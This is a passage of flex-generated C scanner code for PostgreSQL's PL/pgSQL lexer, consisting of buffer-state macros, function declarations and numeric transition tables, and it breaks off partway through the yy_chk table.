YY_BUFFER_STATE * yy_buffer_stack = 0; /**< Stack as an array. */ /* We provide macros for accessing buffer states in case in the * future we want to put the buffer states in a more general * "scanner state". * * Returns the top of the stack, or NULL. */ #define YY_CURRENT_BUFFER ( (yy_buffer_stack) \ ? (yy_buffer_stack)[(yy_buffer_stack_top)] \ : NULL) /* Same as previous macro, but useful when we know that the buffer stack is not * NULL or when we need an lvalue. For internal use only. */ #define YY_CURRENT_BUFFER_LVALUE (yy_buffer_stack)[(yy_buffer_stack_top)] /* yy_hold_char holds the character lost when plpgsql_base_yytext is formed. */ static char yy_hold_char; static int yy_n_chars; /* number of characters read into yy_ch_buf */ int plpgsql_base_yyleng; /* Points to current character in buffer. */ static char *yy_c_buf_p = (char *) 0; static int yy_init = 0; /* whether we need to initialize */ static int yy_start = 0; /* start state number */ /* Flag which is used to allow plpgsql_base_yywrap()'s to do buffer switches * instead of setting up a fresh plpgsql_base_yyin. A bit of a hack ... */ static int yy_did_buffer_switch_on_eof; void plpgsql_base_yyrestart (FILE *input_file ); void plpgsql_base_yy_switch_to_buffer (YY_BUFFER_STATE new_buffer ); YY_BUFFER_STATE plpgsql_base_yy_create_buffer (FILE *file,int size ); void plpgsql_base_yy_delete_buffer (YY_BUFFER_STATE b ); void plpgsql_base_yy_flush_buffer (YY_BUFFER_STATE b ); void plpgsql_base_yypush_buffer_state (YY_BUFFER_STATE new_buffer ); void plpgsql_base_yypop_buffer_state (void ); static void plpgsql_base_yyensure_buffer_stack (void ); static void plpgsql_base_yy_load_buffer_state (void ); static void plpgsql_base_yy_init_buffer (YY_BUFFER_STATE b,FILE *file ); #define YY_FLUSH_BUFFER plpgsql_base_yy_flush_buffer(YY_CURRENT_BUFFER ) YY_BUFFER_STATE plpgsql_base_yy_scan_buffer (char *base,yy_size_t size ); YY_BUFFER_STATE plpgsql_base_yy_scan_string (yyconst char *yy_str ); YY_BUFFER_STATE plpgsql_base_yy_scan_bytes (yyconst char *bytes,int len ); void *plpgsql_base_yyalloc (yy_size_t ); void *plpgsql_base_yyrealloc (void *,yy_size_t ); void plpgsql_base_yyfree (void * ); #define yy_new_buffer plpgsql_base_yy_create_buffer #define yy_set_interactive(is_interactive) \ { \ if ( ! YY_CURRENT_BUFFER ){ \ plpgsql_base_yyensure_buffer_stack (); \ YY_CURRENT_BUFFER_LVALUE = \ plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); \ } \ YY_CURRENT_BUFFER_LVALUE->yy_is_interactive = is_interactive; \ } #define yy_set_bol(at_bol) \ { \ if ( ! YY_CURRENT_BUFFER ){\ plpgsql_base_yyensure_buffer_stack (); \ YY_CURRENT_BUFFER_LVALUE = \ plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); \ } \ YY_CURRENT_BUFFER_LVALUE->yy_at_bol = at_bol; \ } #define YY_AT_BOL() (YY_CURRENT_BUFFER_LVALUE->yy_at_bol) /* Begin user sect3 */ #define plpgsql_base_yywrap(n) 1 #define YY_SKIP_YYWRAP typedef unsigned char YY_CHAR; FILE *plpgsql_base_yyin = (FILE *) 0, *plpgsql_base_yyout = (FILE *) 0; typedef int yy_state_type; extern int plpgsql_base_yylineno; int plpgsql_base_yylineno = 1; extern char *plpgsql_base_yytext; #define yytext_ptr plpgsql_base_yytext static yy_state_type yy_get_previous_state (void ); static yy_state_type yy_try_NUL_trans (yy_state_type current_state ); static int yy_get_next_buffer (void ); static void yy_fatal_error (yyconst char msg[] ); /* Done after the current pattern has been matched and before the * corresponding action - sets up plpgsql_base_yytext. */ #define YY_DO_BEFORE_ACTION \ (yytext_ptr) = yy_bp; \ plpgsql_base_yyleng = (size_t) (yy_cp - yy_bp); \ (yy_hold_char) = *yy_cp; \ *yy_cp = '\0'; \ (yy_c_buf_p) = yy_cp; #define YY_NUM_RULES 94 #define YY_END_OF_BUFFER 95 /* This struct is not used in this scanner, but its presence is necessary. */ struct yy_trans_info { flex_int32_t yy_verify; flex_int32_t yy_nxt; }; static yyconst flex_int16_t yy_accept[373] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 95, 93, 76, 76, 93, 93, 82, 93, 93, 93, 74, 93, 2, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 93, 88, 87, 85, 81, 80, 81, 91, 91, 92, 76, 75, 0, 58, 89, 66, 0, 77, 3, 78, 74, 1, 0, 58, 0, 0, 58, 58, 6, 58, 58, 58, 58, 58, 58, 83, 58, 58, 58, 58, 58, 58, 58, 26, 27, 31, 58, 58, 58, 58, 58, 40, 58, 58, 58, 58, 58, 58, 58, 51, 58, 58, 58, 0, 88, 86, 84, 79, 91, 90, 0, 58, 0, 0, 0, 0, 0, 77, 0, 0, 0, 0, 59, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 18, 58, 58, 58, 58, 23, 58, 25, 58, 58, 58, 32, 58, 58, 0, 36, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 0, 0, 0, 0, 0, 0, 67, 0, 0, 0, 59, 0, 59, 0, 0, 58, 58, 58, 58, 58, 58, 58, 58, 58, 58, 57, 15, 58, 58, 58, 21, 58, 24, 28, 58, 30, 33, 34, 0, 58, 38, 39, 58, 58, 58, 58, 58, 58, 58, 58, 58, 50, 52, 58, 54, 58, 0, 0, 0, 0, 67, 0, 67, 0, 0, 0, 0, 0, 0, 0, 0, 60, 4, 5, 7, 58, 58, 58, 11, 58, 58, 58, 58, 17, 58, 58, 22, 58, 0, 58, 58, 42, 58, 58, 58, 58, 58, 58, 58, 58, 55, 0, 0, 0, 0, 0, 0, 0, 68, 0, 61, 0, 0, 0, 60, 0, 60, 0, 58, 58, 10, 58, 58, 58, 16, 58, 58, 29, 0, 37, 58, 43, 58, 45, 58, 58, 48, 49, 58, 0, 0, 69, 0, 0, 0, 68, 0, 68, 0, 0, 0, 0, 0, 58, 58, 12, 13, 58, 58, 20, 0, 41, 58, 46, 58, 53, 56, 0, 0, 0, 0, 0, 0, 62, 0, 8, 9, 58, 58, 0, 58, 58, 0, 0, 70, 0, 64, 0, 0, 58, 19, 35, 58, 47, 72, 0, 0, 0, 63, 58, 44, 0, 71, 65, 14, 73, 0 } ; static yyconst flex_int32_t yy_ec[256] = { 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 1, 2, 4, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 5, 6, 7, 8, 1, 9, 1, 1, 10, 1, 1, 11, 12, 13, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 15, 1, 1, 16, 1, 1, 1, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 26, 27, 28, 29, 30, 31, 26, 32, 33, 34, 35, 36, 37, 38, 39, 26, 1, 40, 1, 1, 41, 1, 42, 43, 44, 45, 46, 47, 48, 49, 50, 26, 26, 51, 52, 53, 54, 55, 26, 56, 57, 58, 59, 60, 61, 62, 63, 26, 1, 1, 1, 1, 1, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26 } ; static yyconst flex_int32_t yy_meta[64] = { 0, 1, 2, 3, 4, 5, 1, 6, 7, 8, 1, 1, 9, 1, 10, 1, 1, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 8, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11 } ; static yyconst flex_int16_t yy_base[399] = { 0, 0, 307, 55, 56, 63, 64, 65, 68, 281, 2417, 74, 77, 79, 76, 2417, 265, 260, 244, 239, 223, 2417, 85, 96, 158, 197, 248, 290, 99, 111, 348, 95, 97, 99, 165, 179, 389, 211, 425, 256, 40, 0, 229, 0, 2417, 2417, 224, 0, 0, 203, 135, 194, 193, 199, 2417, 172, 188, 0, 2417, 2417, 180, 2417, 232, 259, 99, 285, 330, 292, 327, 331, 290, 361, 471, 395, 418, 2417, 412, 384, 527, 469, 454, 388, 504, 493, 503, 539, 540, 577, 593, 539, 473, 600, 607, 597, 642, 621, 628, 642, 647, 653, 684, 701, 691, 54, 0, 2417, 2417, 2417, 0, 2417, 183, 715, 184, 722, 194, 740, 172, 0, 56, 53, 744, 173, 748, 751, 745, 511, 743, 620, 748, 752, 806, 813, 825, 748, 837, 813, 825, 850, 845, 870, 884, 895, 874, 894, 875, 919, 939, 927, 951, 937, 934, 943, 945, 977, 1001, 985, 987, 1004, 1049, 1005, 1041, 1036, 1051, 1045, 1053, 1069, 94, 165, 110, 102, 1109, 158, 1113, 110, 161, 139, 1127, 1134, 1141, 250, 1152, 1118, 1119, 1139, 1165, 1159, 1160, 1189, 1213, 1197, 1141, 1231, 1217, 1224, 1256, 1235, 1270, 1288, 1295, 1302, 1313, 1316, 1327, 1330, 99, 1322, 1346, 1349, 1329, 1346, 1373, 1343, 1396, 1403, 1368, 1386, 1398, 1452, 1459, 1422, 1471, 1432, 181, 168, 210, 116, 1482, 1489, 1496, 344, 1427, 208, 187, 216, 240, 1507, 101, 289, 1511, 1514, 1525, 1528, 1519, 1547, 1559, 1578, 1538, 1548, 1562, 1609, 1620, 1623, 1634, 1637, 253, 1639, 1664, 1689, 1640, 1696, 1622, 1680, 1680, 1684, 1714, 1699, 1747, 291, 290, 228, 329, 328, 1758, 100, 518, 345, 2417, 352, 378, 86, 1762, 551, 677, 380, 1746, 1746, 1780, 1766, 1805, 1773, 1819, 1815, 1816, 1840, 397, 1843, 1865, 1868, 1879, 1882, 1877, 1865, 1901, 1926, 1929, 415, 415, 2417, 424, 432, 64, 1940, 1721, 1904, 433, 444, 542, 307, 543, 1947, 1939, 1959, 1966, 1984, 1949, 2007, 556, 2018, 1977, 2021, 2005, 2037, 2417, 583, 594, 333, 596, 390, 631, 2417, 652, 2051, 2062, 2025, 2039, 663, 2057, 2077, 404, 669, 2417, 707, 2417, 730, 407, 2069, 2096, 2417, 2114, 2121, 2417, 749, 488, 571, 2417, 2098, 2134, 685, 2417, 2417, 2145, 2417, 2417, 2159, 2170, 2181, 2192, 2198, 2208, 2219, 2230, 2241, 2247, 2258, 2264, 2275, 2285, 2291, 2301, 2312, 2322, 2333, 2343, 2353, 2363, 2374, 2384, 2395, 2405 } ; static yyconst flex_int16_t yy_def[399] = { 0, 372, 1, 373, 373, 374, 374, 375, 375, 372, 372, 372, 372, 376, 377, 372, 372, 372, 372, 372, 372, 372, 378, 378, 378, 24, 24, 24, 378, 378, 378, 24, 24, 24, 378, 378, 24, 378, 24, 378, 372, 379, 372, 380, 372, 372, 372, 381, 381, 382, 372, 383, 383, 372, 372, 372, 384, 385, 372, 372, 372, 372, 372, 378, 372, 386, 378, 378, 378, 24, 30, 378, 30, 378, 378, 372, 30, 378, 378, 378, 378, 24, 378, 378, 30, 378, 24, 378, 378, 24, 78, 378, 378, 78, 30, 378, 378, 378, 78, 378, 378, 378, 78, 372, 379, 372, 372, 372, 381, 372, 387, 372, 383, 372, 372, 388, 384, 385, 372, 372, 386, 389, 390, 378, 78, 30, 30, 30, 24, 24, 378, 378, 378, 78, 378, 78, 78, 378, 78, 378, 378, 378, 24, 78, 24, 378, 378, 78, 372, 78, 24, 30, 30, 30, 378, 24, 24, 78, 378, 24, 78, 30, 78, 30, 30, 24, 372, 387, 372, 372, 388, 391, 392, 372, 372, 389, 372, 372, 390, 372, 393, 30, 30, 78, 378, 78, 24, 378, 378, 24, 30, 378, 78, 30, 378, 24, 378, 378, 378, 378, 378, 378, 378, 378, 372, 78, 378, 378, 24, 78, 378, 24, 378, 378, 78, 24, 78, 378, 378, 78, 378, 78, 372, 372, 372, 391, 372, 372, 392, 372, 394, 372, 372, 372, 372, 393, 395, 396, 378, 378, 378, 378, 30, 378, 378, 378, 24, 24, 30, 378, 378, 378, 378, 378, 372, 78, 378, 378, 78, 378, 30, 30, 24, 24, 378, 30, 378, 372, 372, 372, 372, 372, 394, 397, 398, 372, 372, 372, 372, 395, 372, 372, 396, 372, 30, 24, 378, 78, 378, 30, 378, 78, 78, 378, 372, 378, 378, 378, 378, 378, 78, 24, 378, 378, 378, 372, 372, 372, 372, 372, 397, 372, 372, 398, 372, 372, 372, 372, 372, 378, 78, 378, 378, 378, 24, 378, 372, 378, 24, 378, 30, 378, 372, 372, 372, 372, 372, 372, 372, 372, 372, 378, 378, 78, 30, 372, 78, 378, 372, 372, 372, 372, 372, 372, 372, 78, 378, 372, 378, 378, 372, 372, 372, 372, 372, 30, 378, 372, 372, 372, 378, 372, 0, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372 } ; static yyconst flex_int16_t yy_nxt[2481] = { 0, 10, 11, 12, 11, 13, 10, 14, 10, 15, 10, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 29, 31, 32, 33, 34, 35, 36, 37, 38, 29, 29, 39, 29, 29, 10, 29, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 29, 29, 39, 29, 29, 42, 42, 45, 45, 48, 311, 103, 48, 49, 46, 46, 49, 50, 50, 50, 50, 50, 50, 52, 54, 53, 166, 173, 62, 62, 62, 55, 280, 174, 64, 103, 43, 43, 65, 62, 62, 62, 62, 62, 62, 64, 311, 280, 64, 65, 166, 173, 65, 66, 62, 62, 62, 174, 67, 254, 64, 82, 226, 63, 65, 63, 86, 63, 87, 222, 88, 63, 118, 63, 119, 89, 68, 66, 50, 50, 50, 223, 224, 67, 254, 176, 82, 63, 231, 63, 86, 63, 87, 222, 88, 63, 118, 63, 119, 89, 68, 62, 62, 62, 226, 223, 224, 64, 62, 62, 62, 65, 231, 109, 64, 113, 113, 113, 65, 176, 54, 114, 62, 62, 62, 115, 69, 55, 64, 70, 111, 109, 65, 232, 71, 60, 54, 90, 91, 111, 111, 92, 62, 62, 62, 112, 268, 267, 64, 276, 69, 109, 65, 70, 62, 62, 62, 232, 71, 72, 64, 90, 91, 73, 65, 63, 92, 168, 63, 169, 268, 96, 267, 74, 276, 62, 62, 62, 107, 105, 61, 64, 269, 275, 72, 65, 97, 277, 73, 63, 307, 168, 63, 169, 60, 59, 96, 74, 75, 62, 62, 62, 62, 62, 62, 64, 269, 275, 64, 65, 97, 277, 65, 58, 101, 307, 76, 57, 77, 63, 278, 102, 372, 233, 63, 234, 294, 78, 120, 120, 120, 121, 281, 281, 281, 62, 62, 62, 283, 101, 76, 64, 77, 63, 278, 65, 102, 233, 63, 234, 294, 78, 79, 63, 40, 372, 124, 372, 63, 372, 126, 80, 305, 81, 63, 306, 63, 372, 372, 339, 62, 62, 62, 62, 62, 62, 64, 79, 63, 64, 65, 124, 63, 65, 126, 80, 305, 81, 63, 306, 63, 62, 62, 62, 339, 350, 123, 64, 372, 63, 308, 65, 125, 372, 62, 62, 62, 63, 309, 372, 64, 83, 372, 372, 65, 372, 372, 270, 84, 271, 350, 123, 85, 63, 308, 315, 125, 62, 62, 62, 316, 63, 309, 64, 127, 372, 83, 65, 62, 62, 62, 270, 84, 271, 64, 134, 85, 93, 65, 315, 317, 94, 352, 131, 316, 318, 63, 63, 127, 140, 95, 62, 62, 62, 63, 63, 360, 64, 326, 364, 134, 65, 93, 372, 317, 63, 94, 352, 131, 318, 63, 63, 63, 140, 95, 332, 133, 132, 63, 63, 98, 360, 326, 63, 364, 333, 99, 62, 62, 62, 63, 63, 334, 64, 335, 100, 63, 65, 336, 332, 133, 132, 62, 62, 62, 98, 337, 63, 64, 333, 99, 372, 65, 372, 372, 63, 334, 139, 335, 100, 128, 129, 336, 63, 130, 151, 62, 62, 62, 63, 337, 63, 64, 372, 138, 63, 65, 62, 62, 62, 368, 139, 372, 64, 372, 128, 129, 65, 63, 130, 151, 312, 312, 312, 63, 63, 142, 314, 138, 63, 62, 62, 62, 63, 63, 368, 64, 143, 144, 141, 65, 63, 62, 62, 62, 183, 372, 135, 64, 136, 372, 142, 65, 137, 281, 281, 281, 63, 372, 63, 283, 143, 144, 141, 145, 63, 372, 150, 63, 183, 63, 146, 135, 372, 136, 63, 63, 338, 137, 372, 62, 62, 62, 340, 345, 372, 64, 372, 372, 145, 65, 150, 63, 369, 63, 146, 148, 148, 148, 63, 63, 338, 64, 62, 62, 62, 65, 340, 345, 64, 62, 62, 62, 65, 147, 348, 64, 63, 369, 63, 65, 372, 372, 153, 62, 62, 62, 372, 149, 349, 64, 62, 62, 62, 65, 372, 351, 64, 147, 348, 152, 65, 63, 63, 63, 62, 62, 62, 153, 372, 63, 64, 149, 349, 186, 65, 62, 62, 62, 158, 351, 159, 64, 372, 152, 63, 65, 63, 63, 161, 372, 353, 154, 63, 63, 160, 155, 156, 186, 157, 281, 281, 281, 158, 354, 159, 283, 62, 62, 62, 63, 357, 63, 64, 161, 353, 154, 65, 63, 160, 155, 156, 372, 157, 62, 62, 62, 371, 354, 361, 64, 63, 372, 164, 65, 357, 162, 165, 62, 62, 62, 112, 372, 372, 64, 113, 113, 113, 65, 372, 372, 114, 371, 361, 163, 115, 63, 372, 164, 362, 162, 372, 165, 170, 170, 170, 171, 120, 120, 120, 121, 177, 177, 177, 62, 62, 62, 179, 163, 372, 64, 180, 363, 362, 65, 63, 63, 63, 63, 181, 192, 182, 372, 63, 193, 372, 63, 184, 185, 63, 188, 367, 372, 63, 187, 372, 363, 372, 63, 372, 63, 63, 63, 63, 181, 192, 182, 63, 372, 193, 63, 184, 185, 63, 188, 367, 372, 63, 187, 62, 62, 62, 63, 372, 372, 64, 62, 62, 62, 65, 372, 372, 64, 372, 189, 372, 65, 372, 62, 62, 62, 372, 372, 63, 64, 194, 372, 190, 65, 63, 62, 62, 62, 372, 372, 195, 64, 63, 372, 189, 65, 63, 372, 62, 62, 62, 372, 191, 63, 64, 194, 372, 190, 65, 63, 197, 372, 63, 372, 372, 195, 63, 63, 62, 62, 62, 63, 372, 372, 64, 372, 191, 372, 65, 372, 196, 372, 62, 62, 62, 197, 372, 63, 64, 372, 372, 63, 65, 62, 62, 62, 372, 63, 63, 64, 199, 201, 372, 65, 196, 63, 63, 372, 198, 63, 372, 200, 372, 372, 372, 63, 372, 62, 62, 62, 372, 63, 63, 64, 199, 201, 372, 65, 372, 63, 63, 372, 198, 372, 63, 372, 200, 62, 62, 62, 63, 372, 63, 64, 203, 372, 372, 65, 63, 148, 148, 148, 63, 372, 63, 64, 372, 206, 205, 65, 63, 63, 372, 208, 372, 63, 202, 63, 207, 203, 63, 372, 63, 63, 63, 372, 372, 63, 372, 63, 204, 206, 372, 205, 63, 372, 63, 372, 208, 63, 202, 372, 207, 372, 63, 63, 63, 372, 63, 62, 62, 62, 63, 372, 204, 64, 209, 372, 63, 65, 63, 63, 372, 63, 210, 372, 211, 372, 212, 63, 63, 213, 372, 372, 372, 63, 63, 372, 63, 372, 209, 215, 63, 372, 63, 63, 63, 63, 372, 210, 211, 372, 212, 372, 63, 372, 213, 62, 62, 62, 63, 372, 63, 64, 63, 215, 63, 65, 63, 372, 63, 217, 216, 63, 372, 63, 63, 372, 218, 372, 219, 63, 63, 372, 63, 372, 372, 372, 220, 63, 372, 63, 63, 63, 372, 217, 214, 216, 63, 63, 372, 63, 221, 218, 219, 63, 63, 63, 63, 372, 63, 372, 220, 372, 372, 372, 63, 170, 170, 170, 171, 227, 227, 227, 372, 372, 221, 229, 372, 63, 372, 230, 372, 372, 63, 177, 177, 177, 121, 372, 372, 179, 177, 177, 177, 180, 63, 63, 179, 177, 177, 177, 180, 63, 239, 179, 372, 238, 63, 180, 235, 235, 235, 236, 63, 372, 240, 372, 372, 63, 63, 63, 63, 62, 62, 62, 247, 63, 239, 64, 63, 238, 63, 65, 63, 372, 63, 372, 372, 63, 242, 240, 372, 63, 63, 63, 243, 62, 62, 62, 247, 63, 372, 64, 63, 241, 372, 65, 372, 63, 372, 63, 372, 372, 372, 242, 372, 63, 244, 372, 243, 62, 62, 62, 372, 63, 372, 64, 372, 241, 63, 65, 372, 63, 372, 372, 245, 372, 246, 62, 62, 62, 63, 244, 63, 64, 372, 372, 248, 65, 372, 372, 249, 372, 63, 372, 372, 63, 372, 63, 372, 245, 246, 63, 62, 62, 62, 63, 63, 63, 64, 63, 372, 248, 65, 372, 251, 249, 62, 62, 62, 372, 372, 63, 64, 372, 372, 63, 65, 372, 372, 372, 63, 250, 372, 63, 62, 62, 62, 372, 251, 372, 64, 62, 62, 62, 65, 372, 372, 64, 62, 62, 62, 65, 372, 372, 64, 250, 252, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 252, 64, 65, 372, 255, 65, 63, 372, 253, 372, 63, 62, 62, 62, 62, 62, 62, 64, 372, 63, 64, 65, 256, 372, 65, 372, 372, 63, 63, 255, 257, 63, 253, 259, 63, 63, 63, 372, 62, 62, 62, 63, 372, 63, 64, 372, 256, 372, 65, 372, 262, 63, 63, 63, 372, 257, 63, 259, 372, 63, 63, 62, 62, 62, 258, 63, 372, 64, 62, 62, 62, 65, 372, 372, 64, 262, 263, 63, 65, 63, 264, 63, 63, 372, 63, 372, 63, 372, 258, 372, 372, 260, 272, 272, 272, 273, 372, 372, 261, 372, 263, 372, 372, 63, 63, 264, 63, 63, 63, 372, 265, 63, 372, 372, 63, 260, 266, 62, 62, 62, 63, 372, 261, 64, 62, 62, 62, 65, 372, 63, 64, 63, 372, 372, 65, 265, 62, 62, 62, 63, 372, 266, 64, 372, 372, 63, 65, 227, 227, 227, 171, 372, 372, 229, 227, 227, 227, 230, 372, 372, 229, 227, 227, 227, 230, 372, 372, 229, 372, 372, 372, 230, 235, 235, 235, 236, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 63, 372, 372, 372, 284, 372, 372, 285, 62, 62, 62, 63, 372, 372, 64, 372, 372, 372, 65, 372, 62, 62, 62, 372, 288, 63, 64, 63, 372, 284, 65, 285, 63, 372, 63, 63, 372, 289, 286, 62, 62, 62, 63, 290, 372, 64, 372, 372, 288, 65, 63, 63, 372, 372, 63, 372, 63, 372, 63, 372, 372, 289, 286, 372, 372, 372, 63, 372, 290, 287, 62, 62, 62, 372, 63, 372, 64, 372, 63, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 287, 65, 62, 62, 62, 62, 62, 62, 64, 372, 63, 64, 65, 372, 372, 65, 372, 299, 372, 372, 291, 63, 372, 292, 63, 63, 295, 297, 372, 372, 63, 63, 62, 62, 62, 63, 372, 293, 64, 372, 372, 299, 65, 372, 291, 63, 372, 292, 372, 63, 63, 295, 297, 372, 372, 63, 63, 62, 62, 62, 372, 293, 296, 64, 62, 62, 62, 65, 63, 372, 64, 372, 372, 63, 65, 63, 301, 302, 372, 300, 63, 63, 62, 62, 62, 63, 296, 63, 64, 312, 312, 312, 65, 63, 304, 314, 298, 63, 63, 63, 301, 302, 372, 300, 63, 63, 372, 372, 372, 63, 372, 372, 63, 372, 303, 62, 62, 62, 304, 372, 298, 64, 63, 372, 372, 65, 272, 272, 272, 273, 281, 281, 281, 236, 63, 372, 283, 372, 303, 63, 372, 319, 63, 372, 372, 63, 372, 320, 62, 62, 62, 63, 372, 321, 64, 372, 372, 63, 65, 63, 372, 63, 372, 63, 372, 319, 63, 372, 63, 63, 372, 320, 323, 62, 62, 62, 63, 372, 321, 64, 372, 372, 63, 65, 372, 372, 63, 62, 62, 62, 372, 372, 63, 64, 372, 372, 323, 65, 372, 372, 63, 63, 63, 325, 372, 322, 324, 63, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 372, 372, 372, 63, 63, 63, 325, 322, 372, 324, 63, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 63, 327, 65, 63, 63, 372, 329, 372, 330, 372, 63, 62, 62, 62, 312, 312, 312, 64, 372, 372, 314, 65, 372, 372, 63, 327, 372, 63, 328, 63, 372, 329, 330, 372, 372, 63, 62, 62, 62, 62, 62, 62, 64, 372, 372, 64, 65, 372, 372, 65, 312, 312, 312, 273, 372, 372, 314, 62, 62, 62, 331, 372, 372, 64, 372, 372, 63, 65, 342, 62, 62, 62, 63, 372, 372, 64, 62, 62, 62, 65, 372, 372, 64, 372, 63, 331, 65, 344, 372, 341, 372, 63, 63, 342, 62, 62, 62, 63, 372, 372, 64, 372, 372, 372, 65, 372, 372, 372, 63, 372, 372, 344, 63, 341, 372, 346, 63, 62, 62, 62, 63, 372, 372, 64, 372, 372, 343, 65, 62, 62, 62, 62, 62, 62, 64, 63, 63, 64, 65, 346, 372, 65, 347, 372, 63, 372, 63, 62, 62, 62, 343, 372, 63, 64, 63, 372, 372, 65, 355, 372, 63, 62, 62, 62, 372, 372, 347, 64, 372, 63, 63, 65, 62, 62, 62, 372, 356, 63, 64, 63, 63, 372, 65, 355, 63, 372, 63, 62, 62, 62, 358, 372, 372, 64, 63, 372, 365, 65, 63, 372, 356, 372, 63, 372, 63, 372, 62, 62, 62, 63, 372, 63, 64, 372, 372, 358, 65, 372, 372, 359, 372, 365, 372, 63, 62, 62, 62, 63, 63, 372, 64, 62, 62, 62, 65, 63, 372, 64, 372, 370, 372, 65, 366, 359, 62, 62, 62, 372, 372, 372, 64, 372, 372, 63, 65, 62, 62, 62, 372, 63, 372, 64, 372, 370, 372, 65, 372, 366, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 44, 44, 44, 44, 44, 44, 44, 44, 44, 44, 44, 47, 47, 47, 47, 47, 47, 47, 47, 47, 47, 47, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 56, 372, 372, 372, 56, 56, 63, 63, 63, 372, 63, 63, 372, 63, 63, 63, 104, 104, 104, 104, 104, 104, 104, 372, 104, 104, 104, 106, 106, 372, 106, 106, 106, 106, 106, 106, 106, 106, 108, 108, 108, 108, 108, 372, 108, 108, 108, 108, 108, 110, 372, 372, 372, 372, 110, 52, 52, 52, 52, 52, 52, 52, 52, 52, 52, 52, 116, 372, 372, 372, 116, 116, 117, 117, 372, 372, 117, 117, 117, 117, 117, 117, 117, 122, 122, 122, 122, 372, 372, 372, 372, 372, 122, 167, 372, 372, 372, 167, 167, 172, 172, 172, 172, 372, 372, 372, 372, 372, 172, 175, 175, 175, 175, 175, 175, 175, 175, 175, 175, 175, 178, 178, 178, 372, 178, 178, 372, 178, 178, 178, 225, 225, 225, 225, 225, 225, 225, 225, 225, 225, 225, 228, 228, 228, 372, 228, 228, 372, 228, 228, 228, 237, 237, 237, 237, 372, 372, 372, 372, 372, 237, 274, 274, 274, 274, 372, 372, 372, 372, 372, 274, 279, 279, 279, 279, 279, 279, 279, 279, 279, 279, 279, 282, 282, 282, 372, 282, 282, 372, 372, 282, 282, 310, 310, 310, 310, 310, 310, 310, 310, 310, 310, 310, 313, 313, 313, 372, 313, 313, 372, 372, 313, 313, 9, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372 } ; static yyconst flex_int16_t yy_chk[2481] = { 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 4, 5, 6, 7, 310, 40, 8, 7, 5, 6, 8, 11, 11, 11, 12, 12, 12, 13, 14, 13, 103, 118, 22, 22, 22, 14, 279, 119, 22, 40, 3, 4, 22, 23, 23, 23, 28, 28, 28, 23, 273, 236, 28, 23, 103, 118, 28, 22, 29, 29, 29, 119, 23, 204, 29, 28, 225, 31, 29, 32, 31, 33, 32, 166, 33, 31, 64, 32, 64, 33, 23, 22, 50, 50, 50, 168, 169, 23, 204, 175, 28, 31, 173, 32, 31, 33, 32, 166, 33, 31, 64, 32, 64, 33, 23, 24, 24, 24, 171, 168, 169, 24, 34, 34, 34, 24, 173, 167, 34, 55, 55, 55, 34, 121, 116, 55, 35, 35, 35, 55, 24, 55, 35, 24, 112, 110, 35, 174, 24, 60, 56, 34, 34, 52, 51, 35, 53, 53, 53, 53, 223, 222, 53, 232, 24, 49, 53, 24, 37, 37, 37, 174, 24, 25, 37, 34, 34, 25, 37, 25, 35, 114, 25, 114, 223, 